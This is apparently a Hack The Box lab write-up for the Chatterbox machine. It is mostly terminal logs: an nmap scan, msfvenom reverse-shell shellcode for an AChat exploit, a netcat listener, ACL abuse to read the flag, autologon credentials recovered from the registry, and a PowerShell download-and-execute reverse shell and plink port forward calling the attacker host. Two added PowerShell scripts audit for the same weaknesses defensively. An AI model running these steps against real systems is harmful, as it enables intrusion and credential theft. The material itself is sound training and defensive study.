root@kali:~/htb# nmap -p- 10.10.10.74
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-20 08:24 EDT
Stats: 0:12:55 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 33.42% done; ETC: 09:02 (0:25:10 remaining)
Stats: 0:12:57 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 33.52% done; ETC: 09:02 (0:25:09 remaining)
Nmap scan report for 10.10.10.74
Host is up (0.034s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE
9255/tcp open  mon
9256/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 1662.31 seconds
Generating the shellcode with msfvenom. Lucky for us the author of the exploit was nice enough to specify his exact command in the comments, so we know the correct options along with which bad characters to exclude.
root@kali:~/htb# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp lhost=10.10.14.5 lport=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' EXITFUNC=thread BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3706 bytes
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
--snip--
buf += "\x70\x47\x4a\x73\x51\x62\x42\x4f\x72\x4a\x39\x70\x42"
buf += "\x33\x69\x6f\x59\x45\x41\x41"
root@kali:~/htb#
We can go ahead and edit the exploit with our newly generated shellcode. Start up a netcat listener and run our exploit.
There seemed to be a file permissions misconfiguration on the local Administrator's folder and the root.txt file. I assumed this was the method we were supposed to take to get the root.txt flag. root.txt is owned by Alfred, so we can use cacls to grant ourselves permission on the root.txt file and read it.
root@kali:~/htb# python achat.py
---->{P00F}!
root@kali:~/htb# rlwrap nc -lvp 443
listening on [any] 443 ...
10.10.10.74: inverse host lookup failed: Unknown host
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.74] 49157
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
chatterbox\alfred
C:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.
C:\Users\Administrator\Desktop>dir /Q
dir /Q
Volume in drive C has no label.
Volume Serial Number is 9034-6528
Directory of C:\Users\Administrator\Desktop
12/10/2017 07:50 PM <DIR> BUILTIN\Administrators .
12/10/2017 07:50 PM <DIR> NT AUTHORITY\SYSTEM ..
12/10/2017 07:50 PM 32 CHATTERBOX\Alfred root.txt
1 File(s) 32 bytes
2 Dir(s) 17,932,922,880 bytes free
C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop
cacls C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
CHATTERBOX\Administrator:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CHATTERBOX\Alfred:(OI)(CI)(ID)F
C:\Users\Administrator\Desktop>cacls root.txt /g Alfred:r
cacls root.txt /g Alfred:r
Are you sure (Y/N)?y
processed file: C:\Users\Administrator\Desktop\root.txt
C:\Users\Administrator\Desktop>type root.txt
a67*****c7c
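The weakness just used (a non-administrator owning, and holding Full Control on, files inside the Administrator profile) is exactly what a permissions audit should surface before anyone else does. The following PowerShell script is an added example, not from the original write-up: it walks a profile directory, flags any item owned by an unexpected principal or granting an unexpected principal write-capable rights, and ends with the icacls/takeown commands that undo the Chatterbox case. The profile path and the allow-list are assumptions.

```powershell
# Added example, not from the original write-up. Audits a user profile for
# ownership or write-capable ACEs held by principals outside an allow-list,
# the pattern that let CHATTERBOX\Alfred read root.txt above.
# $ProfilePath and $Allowed are assumptions for the Chatterbox host.
param(
    [string]$ProfilePath = 'C:\Users\Administrator',
    [string[]]$Allowed = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                           'CHATTERBOX\Administrator')
)

# Rights that let a principal modify content, permissions or ownership.
$risky = [System.Security.AccessControl.FileSystemRights]::Write -bor
         [System.Security.AccessControl.FileSystemRights]::Delete -bor
         [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
         [System.Security.AccessControl.FileSystemRights]::TakeOwnership

$items = @(Get-Item -LiteralPath $ProfilePath) +
         @(Get-ChildItem -LiteralPath $ProfilePath -Recurse -Force -ErrorAction SilentlyContinue)

$findings = foreach ($item in $items) {
    $acl = Get-Acl -LiteralPath $item.FullName -ErrorAction SilentlyContinue
    if (-not $acl) { continue }

    # Ownership by a non-allowed account (dir /Q showed root.txt owned by Alfred).
    if ($Allowed -notcontains $acl.Owner) {
        [pscustomobject]@{ Path = $item.FullName; Identity = $acl.Owner;
                           Finding = 'Owner'; Inherited = $false }
    }

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $who = $ace.IdentityReference.Value
        if ($Allowed -contains $who) { continue }
        if (([int]$ace.FileSystemRights -band [int]$risky) -eq 0) { continue }
        [pscustomobject]@{ Path = $item.FullName; Identity = $who;
                           Finding = "Allow $($ace.FileSystemRights)";
                           Inherited = $ace.IsInherited }
    }
}

$findings | Format-Table -AutoSize

# Remediation for the case above: drop the explicit ACE at the top of the
# profile so the inherited copies go with it, then fix ownership of the file.
#   icacls C:\Users\Administrator /remove:g CHATTERBOX\Alfred /T
#   takeown /F C:\Users\Administrator\Desktop\root.txt /A
```

Run it elevated; as a standard user Get-Acl fails on items you cannot read, which the script silently skips.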
Privilege Escalation
After running through some basic privilege escalation enumeration (ahem) we find some credentials in the registry for autologon.
C:\Windows\Panther>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
DefaultDomainName REG_SZ
DefaultUserName REG_SZ Alfred
DefaultPassword REG_SZ Welcome1!
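From the defender's side the finding is that an autologon password was sitting in cleartext in a registry key any local user can read. The following PowerShell check is an added example, not part of the original write-up: it reads the same Winlogon values, reports whether DefaultPassword is populated, lists which principals can query the key, and notes the remediation. Nothing beyond the registry path shown above is assumed.

```powershell
# Added example, not from the original write-up. Inspects the Winlogon values
# the reg query above read, reports whether a cleartext DefaultPassword is set,
# and shows which principals can read the key (ordinary users can, which is
# why a low-privileged shell could recover the password).
$key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$props = Get-ItemProperty -Path $key

$report = [pscustomobject]@{
    AutoAdminLogon    = $props.AutoAdminLogon
    DefaultDomainName = $props.DefaultDomainName
    DefaultUserName   = $props.DefaultUserName
    CleartextPassword = -not [string]::IsNullOrEmpty($props.DefaultPassword)
}
$report | Format-List

# Principals allowed to query values under the key; expect BUILTIN\Users here.
$queryValues = [int][System.Security.AccessControl.RegistryRights]::QueryValues
(Get-Acl -Path $key).Access |
    Where-Object { $_.AccessControlType -eq 'Allow' -and
                   (([int]$_.RegistryRights -band $queryValues) -ne 0) } |
    Select-Object IdentityReference, RegistryRights, IsInherited |
    Format-Table -AutoSize

if ($report.CleartextPassword) {
    Write-Warning "DefaultPassword is stored in cleartext under $key for $($props.DefaultUserName)."
    # Remediation: remove the value. If unattended logon is genuinely required,
    # the Sysinternals Autologon tool stores the password as an LSA secret
    # instead of in this world-readable value. Uncomment to apply:
    # Remove-ItemProperty -Path $key -Name DefaultPassword
}
```

Removing the value stops the exposure but not the reuse: a password shared between the autologon account and Administrator, as on this box, still needs changing.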
Attempting to re-use this password with the Administrator account is successful. This can be done from PowerShell, or by opening SMB and using Impacket's psexec. Using PowerShell, the commands
$passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('administrator', $passwd)
will store the credentials in $creds for the session. A reverse shell can now be opened with the supplied credentials using the command
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.14.2/puckieshell53.ps1')" -Credential $creds
It's possible that password reuse may be at play here for the Administrator. To exploit this over SMB we'll need to reach port 445 on the target, which the port scan showed as filtered from outside. We can do this by uploading plink.exe to the target and forwarding port 445 back to our attacking machine over SSH.
First we start up our python http server.
root@kali:~/pwk# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.74 - - [20/Aug/2019 08:40:06] "GET /plink.exe HTTP/1.1" 200 -
Next we'll download plink.exe using a PowerShell one-liner.
C:\Users\Alfred>powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.2/plink.exe', 'plink.exe')"
Start SSH service on our attacking box.
root@kali:~/htb/chatterbox# service ssh start
And run plink.exe from our target to forward the port over SSH.
C:\Users\Alfred>plink.exe -l puck -pw iestyle -R 445:127.0.0.1:445 10.10.14.5
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's rsa2 key fingerprint is:
ssh-rsa 2048 fc:4d:bc:2f:51:41:40:0d:2e:e2:86:a6:06:fb:98:88
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Aug 10 09:31:17 2017 from 10.10.10.43
root@kali:~#
We can verify the port forward is working with netstat.
root@kali:~/htb/chatterbox# netstat -ano | grep 445
tcp 0 0 127.0.0.1:445 0.0.0.0:* LISTEN off (0.00/0/0)
tcp6 0 0 ::1:445 :::* LISTEN off (0.00/0/0)
Excellent. Now let's use winexe over the forwarded port to get a shell.
root@kali:~/htb/chatterbox# winexe -U Administrator //127.0.0.1 "cmd.exe"
Enter password:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
chatterbox\administrator
C:\Users\Alfred>powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.5/puckieshell53.ps1', 'puckieshell53.ps1')"
C:\Users\Alfred>powershell -ExecutionPolicy ByPass -File puckieshell53.ps1
Author: Puckiestyle